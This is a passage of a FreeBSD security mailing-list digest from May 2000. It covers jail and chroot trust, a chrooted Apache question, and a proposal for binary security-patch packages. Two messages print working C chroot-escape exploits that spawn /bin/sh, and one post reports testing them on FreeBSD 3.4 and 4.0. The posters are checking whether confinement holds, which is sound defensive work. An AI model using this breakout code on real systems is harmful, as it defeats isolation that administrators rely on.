Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 2: 9:32 2000 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id 0701D37BCE4 for ; Fri, 12 May 2000 02:09:28 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost.freebsd.dk [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.3) with ESMTP id KAA04228; Fri, 12 May 2000 10:00:12 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Paul Hart Cc: Adam Laurie , freebsd-security@FreeBSD.ORG Subject: Re: envy.vuurwerk.nl daily run output In-reply-to: Your message of "Thu, 11 May 2000 10:03:38 MDT." Date: Fri, 12 May 2000 10:00:11 +0200 Message-ID: <4226.958118411@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message , Paul Hart writes: >On Thu, 11 May 2000, Adam Laurie wrote: > >> If someone backdoors your system with an authorized key, and is >> confident they can gain root from a luser account, they don't need to >> go any further, and it's extremely likely that the change will go >> unnoticed *forever* > >But if you have hostile local users with root access, can you even trust >the output from /etc/security? Yes, if you put them in a jail(8). -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD coreteam member | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 6:22:50 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id D99BD37BB3D for ; Fri, 12 May 2000 06:22:46 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id GAA25489; Fri, 12 May 2000 06:20:00 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda25487; Fri May 12 06:19:59 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id GAA59363; Fri, 12 May 2000 06:19:58 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdY59353; Fri May 12 06:19:41 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.10.1/8.9.1) id e4CDJev40777; Fri, 12 May 2000 06:19:40 -0700 (PDT) Message-Id: <200005121319.e4CDJev40777@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdN40751; Fri May 12 06:19:06 2000 X-Mailer: exmh version 2.1.1 10/15/1999 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.0-STABLE X-Sender: cy To: Poul-Henning Kamp Cc: Paul Hart , Adam Laurie , freebsd-security@FreeBSD.ORG Subject: Re: envy.vuurwerk.nl daily run output In-reply-to: Your message of "Fri, 12 May 2000 10:00:11 +0200." <4226.958118411@critter.freebsd.dk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 12 May 2000 06:19:06 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <4226.958118411@critter.freebsd.dk>, Poul-Henning Kamp writes: > In message > , > Paul Hart writes: > >On Thu, 11 May 2000, Adam Laurie wrote: > > > >> If someone backdoors your system with an authorized key, and is > >> confident they can gain root from a luser account, they don't need to > >> go any further, and it's extremely likely that the change will go > >> unnoticed *forever* > > > >But if you have hostile local users with root access, can you even trust > >the output from /etc/security? > > Yes, if you put them in a jail(8). I was about to comment that anyone with root can break out of any chrooted environment including jail, however testing the break out of jail exploit (good thing I tested before I spoke), which BTW worked on FreeBSD-3 and numerous other platforms including Linux, Solaris, and Tru64-UNIX, appears to no longer work under 4.0 -- which is a good thing! When did the FreeBSD chroot(2) get fixed? Once again FreeBSD leads the way. Following is the break-out-of-jail code. #include #include const char *shell = "/bin/sh"; const char *lowerdir = "/tmp"; int main() { int i; assert(chdir("/") != -1); assert(chroot(lowerdir) != -1); for (i = 0; i < 32; i++) assert(chdir("..") != -1); assert(chroot(".") != -1); assert(execl(shell, shell, NULL) != -1); }; Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 7:38:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from mirage.nlink.com.br (mirage.nlink.com.br [200.249.195.3]) by hub.freebsd.org (Postfix) with SMTP id 7C88437B5A2 for ; Fri, 12 May 2000 07:38:31 -0700 (PDT) (envelope-from paulo@nlink.com.br) Received: (qmail 26346 invoked by uid 501); 12 May 2000 14:38:22 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 12 May 2000 14:38:22 -0000 Date: Fri, 12 May 2000 11:38:22 -0300 (EST) From: Paulo Fragoso To: freebsd-security@freebsd.org Subject: CHROOT Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, Is there any HOWTO chrooted apache webserver? Thanks, Paulo Fragoso. -- __O _-\<,_ Why drive when you can bike? (_)/ (_) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 8:36:17 2000 Delivered-To: freebsd-security@freebsd.org Received: from zerg.crazyfoo.org (Zerg.CrazyFOO.OrG [206.55.133.186]) by hub.freebsd.org (Postfix) with ESMTP id 08FB437BEAD for ; Fri, 12 May 2000 08:36:12 -0700 (PDT) (envelope-from pzimdars@Zerg.CrazyFOO.Org) Received: by zerg.crazyfoo.org (Postfix, from userid 501) id 6A2835A037; Fri, 12 May 2000 08:37:47 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by zerg.crazyfoo.org (Postfix) with ESMTP id C7C75E380B; Fri, 12 May 2000 08:37:46 -0700 (PDT) Date: Fri, 12 May 2000 08:37:46 -0700 (PDT) From: Paul Zimdars To: Paulo Fragoso Cc: freebsd-security@freebsd.org Subject: Re: CHROOT In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Maybe try packetstorm.securify.com They have directions to do it for a Linux box..im sure it goes almost the same for a BSD box. Paul On Fri, 12 May 2000, Paulo Fragoso wrote: > Hi, > > Is there any HOWTO chrooted apache webserver? > > Thanks, > Paulo Fragoso. > > -- > __O > _-\<,_ Why drive when you can bike? > (_)/ (_) > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 8:47:32 2000 Delivered-To: freebsd-security@freebsd.org Received: from modemcable127.61-201-24.mtl.mc.videotron.net (modemcable127.61-201-24.mtl.mc.videotron.net [24.201.61.127]) by hub.freebsd.org (Postfix) with SMTP id E3D1A37B54E for ; Fri, 12 May 2000 08:47:29 -0700 (PDT) (envelope-from patrick@mindstep.com) Received: (qmail 62705 invoked from network); 12 May 2000 15:47:29 -0000 Received: from patrak.local.mindstep.com (HELO PATRAK) (192.168.10.4) by jacuzzi.local.mindstep.com with SMTP; 12 May 2000 15:47:29 -0000 Message-ID: <0e8c01bfbc29$4432e390$040aa8c0@local.mindstep.com> From: "Patrick Bihan-Faou" To: "Cy Schubert - ITSD Open Systems Group" Cc: References: <4226.958118411@critter.freebsd.dk> <200005121319.e4CDJev40777@cwsys.cwsent.com> Subject: Re: envy.vuurwerk.nl daily run output Date: Fri, 12 May 2000 11:46:41 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6700 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, > I was about to comment that anyone with root can break out of any > chrooted environment including jail, however testing the break out of > jail exploit (good thing I tested before I spoke), which BTW worked on > FreeBSD-3 and numerous other platforms including Linux, Solaris, and > Tru64-UNIX, appears to no longer work under 4.0 -- which is a good > thing! When did the FreeBSD chroot(2) get fixed? > > Once again FreeBSD leads the way. > > Following is the break-out-of-jail code. I just tested the exploit code on a 3.4 system and a 4.0 system and my results are: - if I run the program as root, then programs runs properly: starts SH in / - if I run the program as !root, then the program fails to chroot to back to / (I guess this is the expected behaviour). For info: The FreeBSD 3.x machine: FreeBSD jacuzzi.local.mindstep.com 3.4-STABLE FreeBSD 3.4-STABLE #8: Thu Apr 27 00:13:41 EDT 2000 patrick@jacuzzi.local.mindstep.com:/usr/src/sys/compile/JACUZZI i386 The FreeBSD 4.0 machine: FreeBSD nitro 4.0-STABLE FreeBSD 4.0-STABLE #3: Fri Apr 21 15:10:09 EDT 2000 patrick@nitro:/usr/src/sys/compile/NITRO i386 So my question is: is the exploit really fixed ? Or is it normal for root to be able to break loose from chroot ? Patrick. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 9:40:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 1E60337B5EB for ; Fri, 12 May 2000 09:40:10 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id MAA48513; Fri, 12 May 2000 12:40:05 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Fri, 12 May 2000 12:40:04 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Derek Werthmuller Cc: freebsd-security@FreeBSD.ORG Subject: Re: Applying patches with out a compiler In-Reply-To: <7A71D0D43B9ED1119EC10008C756C3042F76FB@ctg-nt.ctg.albany.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 11 May 2000, Derek Werthmuller wrote: > I'm interested in applying standard "Release" versions of FreeBSD with out > using a compiler in the system. I generaly don't advise leaving a working > compiler in say a firewall or a hardened system. I know that I can have a > seperate system that I can use to connect via CVS and use that to update the > hardened systems. But doesn't that just keep my sources up to date and I > still need to build/build world every so often? Is there another way to > apply the security related patches ? For patches where it's appropriate, I've been strongly considering releasing "packages" that update the key parts of the base OS for security fixes. This would be similar to the BSD/OS patch level support for fixes, although restricted only to security stuff. This would provide access to security fixes for non-source-centric sites, which I think is important. With 4.0 I haven't had the opportunity to exercise this possibility as yet. :-) I.e., pkg_add secpatch_4.0-RELEASE_001.tgz Would replace the faulty binaries with better ones, and leave behind a package install record so you could easily determine which security patches are installed. And if appropriate, could back up the original binaries allowing pkg_delete to restore the original state. Any thoughts on this? Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 9:47:18 2000 Delivered-To: freebsd-security@freebsd.org Received: from easeway.com (ns1.easeway.com [209.69.39.1]) by hub.freebsd.org (Postfix) with ESMTP id CE8DB37B5D7; Fri, 12 May 2000 09:47:09 -0700 (PDT) (envelope-from mwlucas@easeway.com) Received: (from mwlucas@localhost) by easeway.com (8.8.8/8.8.5) id MAA04341; Fri, 12 May 2000 12:32:06 -0400 (EDT) Message-Id: <200005121632.MAA04341@easeway.com> Subject: Re: Applying patches with out a compiler In-Reply-To: from Robert Watson at "May 12, 0 12:40:04 pm" To: rwatson@FreeBSD.ORG (Robert Watson) Date: Fri, 12 May 100 12:32:06 -0400 (EDT) Cc: freebsd-security@FreeBSD.ORG From: mwlucas@exceptionet.com X-Mailer: ELM [version 2.4ME+ PL32 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Would replace the faulty binaries with better ones, and leave behind a > package install record so you could easily determine which security > patches are installed. And if appropriate, could back up the original > binaries allowing pkg_delete to restore the original state. > > Any thoughts on this? Thougts? How about, "yes, please, sir!" Make world is nice, but doesn't cut it on a 486. Many of my clients don't run NFS, so I have to bring along my laptop NFS server. A buncha users don't have that option, I'm sure. ==ml -- Michael Lucas | Exceptionet, Inc. | www.exceptionet.com "Exceptional Networking" | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 9:58:52 2000 Delivered-To: freebsd-security@freebsd.org Received: from giganda.komkon.org (giganda.komkon.org [209.125.17.66]) by hub.freebsd.org (Postfix) with ESMTP id 4D02237BF75; Fri, 12 May 2000 09:58:44 -0700 (PDT) (envelope-from str@giganda.komkon.org) Received: (from str@localhost) by giganda.komkon.org (8.9.3/8.9.3) id MAA86229; Fri, 12 May 2000 12:58:42 -0400 (EDT) From: Igor Roshchin Message-Id: <200005121658.MAA86229@giganda.komkon.org> Subject: Re: Applying patches with out a compiler In-Reply-To: from "Robert Watson" at "May 12, 2000 12:40:04 pm" To: "Robert Watson" Date: Fri, 12 May 2000 12:58:42 -0400 (EDT) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL61 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > For patches where it's appropriate, I've been strongly considering > releasing "packages" that update the key parts of the base OS for security > fixes. This would be similar to the BSD/OS patch level support for fixes, > although restricted only to security stuff. This would provide access to > security fixes for non-source-centric sites, which I think is important. > With 4.0 I haven't had the opportunity to exercise this possibility as > yet. :-) > > I.e., > > pkg_add secpatch_4.0-RELEASE_001.tgz > > Would replace the faulty binaries with better ones, and leave behind a > package install record so you could easily determine which security > patches are installed. And if appropriate, could back up the original > binaries allowing pkg_delete to restore the original state. > > Any thoughts on this? > > Robert N M Watson > That would be very useful for the production environment, as well as for the low-end computers, or just computers with limited resources. Igor To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 10:46:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from zeta.qmw.ac.uk (zeta.qmw.ac.uk [138.37.6.6]) by hub.freebsd.org (Postfix) with ESMTP id B655B37B5DE; Fri, 12 May 2000 10:46:07 -0700 (PDT) (envelope-from d.m.pick@qmw.ac.uk) Received: from xi.css.qmw.ac.uk ([138.37.8.11]) by zeta.qmw.ac.uk with esmtp (Exim 3.02 #1) id 12qJVf-0000Ki-00; Fri, 12 May 2000 18:45:59 +0100 Received: from cgaa180 by xi.css.qmw.ac.uk with local (Exim 1.92 #1) id 12qJVg-0005ow-00; Fri, 12 May 2000 18:46:00 +0100 X-Mailer: exmh version 2.0.2 2/24/98 To: Robert Watson Cc: freebsd-security@FreeBSD.ORG Subject: Re: Applying patches with out a compiler In-reply-to: Your message of "Fri, 12 May 2000 12:40:04 EDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 12 May 2000 18:46:00 +0100 From: David Pick Message-Id: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > For patches where it's appropriate, I've been strongly considering > releasing "packages" that update the key parts of the base OS for security > fixes. This would be similar to the BSD/OS patch level support for fixes, > although restricted only to security stuff. This would provide access to > security fixes for non-source-centric sites, which I think is important. > With 4.0 I haven't had the opportunity to exercise this possibility as > yet. :-) > > I.e., > > pkg_add secpatch_4.0-RELEASE_001.tgz > > Would replace the faulty binaries with better ones, and leave behind a > package install record so you could easily determine which security > patches are installed. And if appropriate, could back up the original > binaries allowing pkg_delete to restore the original state. > > Any thoughts on this? Very useful. A few points: - We'd need to allow for USA/international versions, preferably with different names. Perhaps a third "set" of names for the "patches" that are independent of geography: - secpatch_4.0-RELEASE_global-001 - secpatch_4.0-RELEASE_international-001 - secpatch_4.0-RELEASE_USAonly-001 - The automatic dependency system would be magic, especially if there was a "top level" package listing the latest "patches" - possibly another "set" containing *source* patches for the kernel only, for the sites who need to rebuild the kernel but carry no other sources, to make the installation of these important patches easier and hence more likely to happen A few questions: - should each "patch" package have all the previous ones as dependencies? - most package names seem to use the convention of a basic name, a hyphen, then the version number; does this really matter so the package names would need to be modifiled slightly? - how sensitive can the system be made to the fact that different combinations of distribution sets give defferent sets of binary programs: there's the international/USA versions, but (as I've just realised), there's also the issue of kerberos/non-kerberos versions of some binaries. -- David Pick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 11:11:19 2000 Delivered-To: freebsd-security@freebsd.org Received: from foobar.franken.de (foobar.franken.de [194.94.249.81]) by hub.freebsd.org (Postfix) with ESMTP id C1C2937B802 for ; Fri, 12 May 2000 11:11:12 -0700 (PDT) (envelope-from logix@foobar.franken.de) Received: (from logix@localhost) by foobar.franken.de (8.8.8/8.8.5) id UAA16066; Fri, 12 May 2000 20:06:20 +0200 (CEST) Message-ID: <20000512200619.A14067@foobar.franken.de> Date: Fri, 12 May 2000 20:06:19 +0200 From: Harold Gutch To: Cy Schubert - ITSD Open Systems Group , Poul-Henning Kamp Cc: Paul Hart , Adam Laurie , freebsd-security@FreeBSD.ORG Subject: Re: envy.vuurwerk.nl daily run output References: <4226.958118411@critter.freebsd.dk> <200005121319.e4CDJev40777@cwsys.cwsent.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <200005121319.e4CDJev40777@cwsys.cwsent.com>; from Cy Schubert - ITSD Open Systems Group on Fri, May 12, 2000 at 06:19:06AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, May 12, 2000 at 06:19:06AM -0700, Cy Schubert - ITSD Open Systems Group wrote: > chrooted environment including jail, however testing the break out of > jail exploit (good thing I tested before I spoke), which BTW worked on > FreeBSD-3 and numerous other platforms including Linux, Solaris, and > Tru64-UNIX, appears to no longer work under 4.0 -- which is a good > thing! When did the FreeBSD chroot(2) get fixed? > > Once again FreeBSD leads the way. > > Following is the break-out-of-jail code. > > #include > #include > > const char *shell = "/bin/sh"; > const char *lowerdir = "/tmp"; > > int main() { > int i; > > assert(chdir("/") != -1); > assert(chroot(lowerdir) != -1); > for (i = 0; i < 32; i++) > assert(chdir("..") != -1); > assert(chroot(".") != -1); > > assert(execl(shell, shell, NULL) != -1); > }; What about the "other" chroot-breakout, does it still work under FreeBSD 4.0? Here's the breakout-code modulo checks wether /tmp exists etc. #include #include #include int main(int argc, char *argv[]) { int handle, i; handle = open("/", O_RDONLY); chroot("/tmp"); chdir("/"); fchdir(handle); for (i = 0; i < 32; i++) chdir(".."); chroot("."); chdir("/"); system("/bin/sh"); return 0; } bye, Harold -- Someone should do a study to find out how many human life spans have been lost waiting for NT to reboot. Ken Deboy on Dec 24 1999 in comp.unix.bsd.freebsd.misc To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 11:30:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id 2DFD737B59E; Fri, 12 May 2000 11:30:42 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) Received: from localhost (jkh@localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id LAA07552; Fri, 12 May 2000 11:32:26 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) To: Robert Watson Cc: Derek Werthmuller , freebsd-security@FreeBSD.ORG Subject: Re: Applying patches with out a compiler In-reply-to: Your message of "Fri, 12 May 2000 12:40:04 EDT." Date: Fri, 12 May 2000 11:32:26 -0700 Message-ID: <7549.958156346@localhost> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > For patches where it's appropriate, I've been strongly considering > releasing "packages" that update the key parts of the base OS for security > fixes. This would be similar to the BSD/OS patch level support for fixes, > although restricted only to security stuff. This would provide access to > security fixes for non-source-centric sites, which I think is important. > With 4.0 I haven't had the opportunity to exercise this possibility as > yet. :-) > > I.e., > > pkg_add secpatch_4.0-RELEASE_001.tgz That would be cool if we could also somehow automate the process, since people will come to depend on it as an upgrade process. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 11:52:46 2000 Delivered-To: freebsd-security@freebsd.org Received: from giganda.komkon.org (giganda.komkon.org [209.125.17.66]) by hub.freebsd.org (Postfix) with ESMTP id 8919937B8AF; Fri, 12 May 2000 11:52:40 -0700 (PDT) (envelope-from str@giganda.komkon.org) Received: (from str@localhost) by giganda.komkon.org (8.9.3/8.9.3) id OAA89027; Fri, 12 May 2000 14:52:27 -0400 (EDT) From: Igor Roshchin Message-Id: <200005121852.OAA89027@giganda.komkon.org> Subject: Re: Applying patches with out a compiler In-Reply-To: from "David Pick" at "May 12, 2000 06:46:00 pm" To: "David Pick" Date: Fri, 12 May 2000 14:52:26 -0400 (EDT) Cc: "Robert Watson" , freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL61 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > > For patches where it's appropriate, I've been strongly considering > > releasing "packages" that update the key parts of the base OS for security > > fixes. This would be similar to the BSD/OS patch level support for fixes, > > although restricted only to security stuff. This would provide access to > > security fixes for non-source-centric sites, which I think is important. > > With 4.0 I haven't had the opportunity to exercise this possibility as > > yet. :-) > > > > I.e., > > > > pkg_add secpatch_4.0-RELEASE_001.tgz > > > > Would replace the faulty binaries with better ones, and leave behind a > > package install record so you could easily determine which security > > patches are installed. And if appropriate, could back up the original > > binaries allowing pkg_delete to restore the original state. > > > > Any thoughts on this? > > Very useful. > > A few points: > - We'd need to allow for USA/international versions, preferably with > different names. Perhaps a third "set" of names for the "patches" > that are independent of geography: > - secpatch_4.0-RELEASE_global-001 > - secpatch_4.0-RELEASE_international-001 > - secpatch_4.0-RELEASE_USAonly-001 > - The automatic dependency system would be magic, especially if there > was a "top level" package listing the latest "patches" > - possibly another "set" containing *source* patches for the kernel > only, for the sites who need to rebuild the kernel but carry no > other sources, to make the installation of these important patches > easier and hence more likely to happen > > A few questions: > - should each "patch" package have all the previous ones as dependencies? > - most package names seem to use the convention of a basic name, a hyphen, > then the version number; does this really matter so the package names > would need to be modifiled slightly? > - how sensitive can the system be made to the fact that different combinations > of distribution sets give defferent sets of binary programs: there's the > international/USA versions, but (as I've just realised), there's also > the issue of kerberos/non-kerberos versions of some binaries. > > -- > David Pick > > > To add a question/suggestion: Would it be possible to take into account the variation of the system version, say, if the system was installed not from the -RELEASE, but from a snapshot ? Here is what I mean: I know, that if you are trying to install packages on such system using /stand/sysinstall, and trying to connect not to releng4.freebsd.org, but to any other site, the program obviously couldn' t find the corresponding distribution, and one has either change the name of the distribution manually, or go to releng4, even though it doesn't seem to matter for packages. It would be nice to avoid such annoyance with the binary patches system suggested. Igor To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 12: 1:32 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id BB3B737B715 for ; Fri, 12 May 2000 12:01:25 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id PAA49430; Fri, 12 May 2000 15:00:47 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Fri, 12 May 2000 15:00:47 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Igor Roshchin Cc: David Pick , freebsd-security@FreeBSD.ORG Subject: Re: Applying patches with out a compiler In-Reply-To: <200005121852.OAA89027@giganda.komkon.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On of the simplifying assumptions here that makes the whole idea of binary security updates feasible is that you are working from a well-known code base. The service I'm willing to provide (and have time to provide) would specifically target the most recent -RELEASE version, and be intended to apply on an otherwise un-modified system. I would provive both KerberosIV and non-Kerberos versions, as I support Kerberos on some of my own machines; however, if it's going to get any more complicated than that, I don't have time to implement it, but would be glad for someone else to pick up the project. My thoughts on dependencies, et al, have been: 1) Binary patches will only be available against the most recent -RELEASE 2) Binary patch packages will depend on all prior binary patches being installed 3) Source patches use to build the binary patched version seem like a good idea. All of this is centered on requiring a very well-defined environment, in which the patch will not break other patches installed, introduce new holes, et al. As I said above, anything more complicated requires rethinking, and should be done in the context of source revision control, etc. This addresses only security concerns; if we want sliding version management in a binary manner across -STABLE, that's another target for another project :-). Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 12:14:43 2000 Delivered-To: freebsd-security@freebsd.org Received: from testbed.baileylink.net (testbed.baileylink.net [63.71.213.24]) by hub.freebsd.org (Postfix) with ESMTP id 43A0F37B511; Fri, 12 May 2000 12:14:38 -0700 (PDT) (envelope-from brad@testbed.baileylink.net) Received: (from brad@localhost) by testbed.baileylink.net (8.9.3/8.9.3) id OAA09614; Fri, 12 May 2000 14:15:26 -0500 (CDT) (envelope-from brad) Date: Fri, 12 May 2000 14:15:26 -0500 From: Brad Guillory To: Robert Watson Cc: freebsd-security@FreeBSD.ORG Subject: Re: Applying patches with out a compiler Message-ID: <20000512141525.F77275@baileylink.net> References: <200005121852.OAA89027@giganda.komkon.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from rwatson@FreeBSD.ORG on Fri, May 12, 2000 at 03:00:47PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Robert, I think that you have sound goals and achievable objectives, the ingredients for a successful project. To accommodate the other camps (international version users for instance) I suggest that you make any tools and methodologies that you develop for the project available. You might consider your dependency stance. It would probably be easier for you to simply maintain a single package with incremental version numbers where each version contains all the fixes. I suspect that the number of binaries that will change over the course of a release will be minor. The usefulness of this project will probably be very limited if you do not address the kernel issue. Many security fixes that I have seen since I joined the list have been if the form of kernel patches. Good luck, BMG On Fri, May 12, 2000 at 03:00:47PM -0400, Robert Watson wrote: > > On of the simplifying assumptions here that makes the whole idea of binary > security updates feasible is that you are working from a well-known code > base. The service I'm willing to provide (and have time to provide) would > specifically target the most recent -RELEASE version, and be intended to > apply on an otherwise un-modified system. I would provide both KerberosIV > and non-Kerberos versions, as I support Kerberos on some of my own > machines; however, if it's going to get any more complicated than that, I > don't have time to implement it, but would be glad for someone else to > pick up the project. > > My thoughts on dependencies, et al, have been: > > 1) Binary patches will only be available against the most recent -RELEASE > 2) Binary patch packages will depend on all prior binary patches being > installed > 3) Source patches use to build the binary patched version seem like a good > idea. > > All of this is centered on requiring a very well-defined environment, in > which the patch will not break other patches installed, introduce new > holes, et al. As I said above, anything more complicated requires > rethinking, and should be done in the context of source revision control, > etc. This addresses only security concerns; if we want sliding version > management in a binary manner across -STABLE, that's another target for > another project :-). > > Robert N M Watson > > robert@fledge.watson.org http://www.watson.org/~robert/ > PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 > TIS Labs at Network Associates, Safeport Network Services > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- __O _-\<,_ Why drive when you can bike? (_)/ (_) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 12:42:52 2000 Delivered-To: freebsd-security@freebsd.org Received: from ctg-nt.ctg.albany.edu (ctg-nt.ctg.albany.edu [169.226.80.32]) by hub.freebsd.org (Postfix) with ESMTP id E7D2F37BE8C; Fri, 12 May 2000 12:42:41 -0700 